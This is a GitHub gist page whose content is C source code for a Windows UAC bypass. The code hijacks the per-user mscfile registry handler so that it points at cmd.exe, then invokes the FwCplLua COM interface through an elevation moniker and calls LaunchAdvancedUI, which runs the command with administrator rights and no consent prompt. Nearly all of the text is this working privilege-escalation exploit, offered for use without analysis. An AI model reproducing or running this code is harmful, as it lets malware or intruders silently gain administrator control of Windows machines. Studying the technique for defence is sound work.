Skip to content

Instantly share code, notes, and snippets.

@decay88
Forked from hfiref0x/akagi_42b.c
Created August 28, 2018 03:25
Show Gist options
  • Save decay88/6bf2a180eea65c1b38a788ef83c786be to your computer and use it in GitHub Desktop.
Save decay88/6bf2a180eea65c1b38a788ef83c786be to your computer and use it in GitHub Desktop.
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IFwCplLua * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)(
__RPC__in IFwCplLua * This);
END_INTERFACE
} *PIFwCplLuaInterfaceVtbl;
interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
BOOL Method42b_Test(
LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
LPWSTR lpBuffer = NULL;
LRESULT lResult;
HKEY hKey = NULL;
SIZE_T sz = 0;
IID xIIDFwCplLua;
IFwCplLua *FwCplLua = NULL;
BIND_OPTS3 bop;
WCHAR szBuffer[MAX_PATH + 1];
WCHAR szElevationMoniker[MAX_PATH];
do {
if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK) {
break;
}
_strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe");
lpBuffer = szBuffer;
sz = _strlen(lpBuffer);
if (sz == 0)
break;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
L"Software\\Classes\\mscfile\\shell\\open\\command",
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
&hKey,
NULL);
if (lResult != ERROR_SUCCESS)
break;
sz = (1 + sz) * sizeof(WCHAR);
lResult = RegSetValueEx(
hKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpBuffer,
(DWORD)sz);
if (lResult != ERROR_SUCCESS)
break;
RegCloseKey(hKey);
hKey = NULL;
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_FwCplLua);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIIDFwCplLua, &FwCplLua);
if (r != S_OK)
break;
if (FwCplLua == NULL) {
r = E_FAIL;
break;
}
r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);
} while (bCond);
if (hKey != NULL)
RegCloseKey(hKey);
if (FwCplLua != NULL) {
FwCplLua->lpVtbl->Release(FwCplLua);
}
return SUCCEEDED(r);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment